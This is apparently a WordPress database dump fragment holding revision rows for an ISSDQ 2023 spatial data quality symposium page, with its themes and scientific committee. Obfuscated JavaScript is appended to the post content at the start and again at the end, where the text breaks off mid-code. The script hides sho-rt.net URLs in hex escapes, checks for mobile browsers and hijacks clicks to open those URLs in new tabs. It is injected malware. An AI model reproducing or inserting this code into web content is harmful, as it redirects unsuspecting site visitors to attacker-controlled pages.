_0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-autosave-v1','','','2023-02-05 14:10:59','2023-02-05 14:10:59','',2791,'https://gsw2023.com/?p=3824',0,'revision','',0),
(3825,1,'2023-02-05 14:14:26','2023-02-05 14:14:26','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2802\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">ISSDQ 2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis</span></strong></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spatial data quality concerns with the reliability, confidence and trustworthiness of spatial data and their fitness for use. In the new era of spatial big data, IoT, smart city, ubiquitous spatial information systems and volunteered data produced using space-borne, areal and geo-sensors as well as human sensors in the phases of collection, fusion and leveraging artificial intelligence for spatial information extraction, and modeling, the issue of spatial data quality and uncertainty assessment requires more attention than ever before. Spatial data quality and uncertainty assessment/modeling are integrated components of spatial information systems main functionalities in measuring, mapping, managing, modeling and monitoring. The 12<sup>th</sup> International Symposium on Spatial Data Quality (ISSDQ 2023) will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single-track symposium of keynote and oral presentations as well as poster sessions and a panel discussion in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h1><strong>CHAIRES</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"51\"][/vc_column_inner][/vc_row_inner][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Spatial data quality in space and time,</strong></h6>\n</li>\n<li>\n<h6><strong>Leveraging artificial intelligence in spatial data analysis and quality assessment,</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative spatial data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty modeling, assessment and propagation in spatial analyses</strong></h6>\n</li>\n<li>\n<h6><strong>Error assessment and propagation in digital terrain modeling</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent methodologies to integrate and assess spatial data and spatial analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Smart spatial data infrastructures, land administration systems, cadastral surveying and mapping, BIM and their quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Interoperability issues in spatial data analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessing big spatial data in spatial information science</strong></h6>\n</li>\n<li>\n<h6>Spatial and spatio-temporal statistics methods and th<strong>eir uncertainty assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessment of UBGI/UBGIS, GSN, autonomous driving, smart city, multidimensional GIS, UAV, marine GIS, disaster management, and real time spatial data collections, collation and processing</strong></h6>\n</li>\n<li>\n<h6><strong>Harmonization of spatial information models and standards</strong></h6>\n</li>\n<li>\n<h6><strong>Matching the spatial data quality of combining multiple datasets</strong></h6>\n</li>\n<li>\n<h6><strong>Increasing spatial data quality through fusion</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning spatial data quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality assessment of transferability</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality visualization</strong></h6>\n</li>\n<li>\n<h6><strong>Web GIS data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor-based data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent GIS</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2803\" img_size=\"1200x800\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bryan C. Pijanowski, University of Purdue, US.</strong></h6>\n</li>\n<li>\n<h6><strong>Christophe Claramunt, Naval Academy Research Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Giles Foody, Nottingham University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Qiming Zhou, Baptist University, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Mir Abolfazl Mostafavi, Laval University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Nico vande Weghe, Ghent University, Belgium</strong></h6>\n</li>\n<li>\n<h6><strong>Alfred Stein, Twente University, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>John W.Z. Shi, The Hong Kong Polytechnic University, </strong></h6>\n<h6><strong>Hong Kong, China</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, TU Wien, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Jamal Jokar Arsanjani, Aalborg University, Denmark</strong></h6>\n</li>\n<li>\n<h6><strong>Ana-Maria Raimond, IGN, France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Blachowski, Warsaw University, Poland</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mojgan Jadidi, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Hossein Chavoshi, University of Life Science, Norway</strong></h6>\n</li>\n<li>\n<h6><strong>Robert G. Pontious, Clark University, US</strong></h6>\n</li>\n<li>\n<h6><strong>Alexis Comber, Leeds University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Bahareh Kalantar, Riken, Japan</strong></h6>\n</li>\n<li>\n<h6><strong>Nicholas Hamm, Nottingham University China Campus, China</strong></h6>\n</li>\n<li>\n<h6><strong>Firoozeh Karimi, North Carolina A &amp; T, US</strong></h6>\n</li>\n<li>\n<h6><strong><a href=\"mailto:Mingshu%20Wang,%20Glasgow%20University,%20UK%20%20.ac.uk\">Mingshu Wang, Glasgow University, UK </a></strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Istanbul Technical University, Turkey</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria, South Africa</strong></h6>\n</li>\n<li>\n<h6><strong>Mei-Po Kwan, Chinese University of Hong Kong, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Cidalia Fonte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Bin Jiang, University of Galve, Sweden</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img src=\"https://gsw2023.com/wp-content/uploads/2022/10/m4-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" class=\"alignnone size-medium wp-image-2805\" /></p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6 style=\"text-align:justify; color:black;\"><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the ISPRS IJGI and Geospatial information Science (GSIS) journals. The papers being accepted after the peer-review process of the journal will appear in a special issue of the journals dedicated to this symposium. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 